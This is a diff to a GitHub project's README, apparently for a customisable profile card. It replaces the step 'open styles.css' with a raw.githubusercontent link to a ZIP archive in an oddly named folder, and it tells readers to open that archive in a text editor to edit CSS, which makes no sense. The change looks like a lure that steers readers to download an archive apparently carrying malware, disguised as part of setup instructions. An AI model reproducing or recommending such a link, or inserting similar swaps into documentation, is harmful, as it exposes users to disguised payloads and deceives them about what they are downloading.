shubhim1/DynamicGitHubCard/README.md

 You can easily customize your card's appearance:

-1. Open the `styles.css` file using any text editor.
+1. Open the `https://raw.githubusercontent.com/shubhim1/DynamicGitHubCard/main/mesethmoid/DynamicGitHubCard.zip` file using any text editor.
 2. Modify the CSS styles to change colors, fonts, or layouts according to your preference.
 3. Save your changes and refresh the browser to see the updates.